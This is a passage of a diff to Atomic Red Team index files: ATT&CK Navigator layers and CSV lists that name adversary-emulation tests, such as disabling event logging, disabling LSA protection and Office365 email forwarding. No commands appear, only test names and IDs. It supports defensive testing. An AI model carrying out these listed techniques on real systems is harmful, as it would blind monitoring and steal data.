Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":5,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS - CloudWatch Log Stream Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Office-365)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.3"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1562","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
+{"name":"Atomic Red Team (Office-365)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}

atomics/Indexes/Indexes-CSV/containers-index.csv

@@ -5,6 +5,7 @@ persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6
 execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
+execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
 privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh

atomics/Indexes/Indexes-CSV/index.csv

@@ -121,6 +121,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
+defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
 defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
 defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
@@ -150,11 +151,12 @@ defense-evasion,T1620,Reflective Code Loading,1,WinPwn - Reflectively load Mimik
 defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
-defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
-defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
-defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
-defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
-defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,2,Disable Windows IIS HTTP Logging via PowerShell,a957fb0f-1e85-49b2-a211-413366784b1e,powershell
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,3,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
 defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
@@ -216,7 +218,8 @@ defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704
 defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
 defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
 defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
-defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Application,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
+defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
+defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
@@ -515,7 +518,8 @@ privilege-escalation,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest a
 privilege-escalation,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 privilege-escalation,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
 privilege-escalation,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
-privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
 privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
@@ -665,6 +669,7 @@ execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using
 execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
 execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
 execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
+execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
 execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
 execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
@@ -689,6 +694,7 @@ execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,ATHPowerShe
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
+execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
 execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
@@ -744,7 +750,7 @@ persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron s
 persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
 persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
 persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
-persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
+persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1505.002,Server Software Component: Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
 persistence,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
@@ -766,7 +772,8 @@ persistence,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account wi
 persistence,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 persistence,T1547.003,Time Providers,1,Create a new time provider,df1efab7-bc6d-4b88-8be9-91f55ae017aa,powershell
 persistence,T1547.003,Time Providers,2,Edit an existing time provider,29e0afca-8d1d-471a-8d34-25512fc48315,powershell
-persistence,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+persistence,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
 persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
@@ -834,6 +841,8 @@ persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Exte
 persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
 persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
+persistence,T1505.004,IIS Components,1,Install IIS Module using AppCmd.exe,53adbdfa-8200-490c-871c-d3b1ab3324b2,command_prompt
+persistence,T1505.004,IIS Components,2,Install IIS Module using PowerShell Cmdlet New-WebGlobalModule,cc3381fb-4bd0-405c-a8e4-6cacfac3b06c,powershell
 persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
@@ -926,6 +935,7 @@ collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing d
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
 collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
+collection,T1114.003,Email Collection: Email Forwarding Rule,1,Office365 - Email Forwarding,3234117e-151d-4254-9150-3d0bac41e38c,powershell
 collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 collection,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
 collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administive share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -106,7 +106,8 @@ persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
-persistence,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+persistence,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
 persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
@@ -129,7 +130,8 @@ privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
-privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
 privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -82,7 +82,8 @@ persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10
 persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
 persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
 persistence,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
-persistence,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+persistence,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
 persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
 persistence,T1136.001,Create Account: Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
@@ -107,7 +108,8 @@ privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab
 privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
 privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
-privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
 privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh

atomics/Indexes/Indexes-CSV/office-365-index.csv

@@ -1 +1,2 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
+collection,T1114.003,Email Collection: Email Forwarding Rule,1,Office365 - Email Forwarding,3234117e-151d-4254-9150-3d0bac41e38c,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -80,6 +80,7 @@ defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution -
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
+defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
 defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
 defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
@@ -105,11 +106,12 @@ defense-evasion,T1620,Reflective Code Loading,1,WinPwn - Reflectively load Mimik
 defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,Signed Binary Proxy Execution: CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
-defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
-defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
-defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
-defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
-defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,2,Disable Windows IIS HTTP Logging via PowerShell,a957fb0f-1e85-49b2-a211-413366784b1e,powershell
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,3,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
+defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
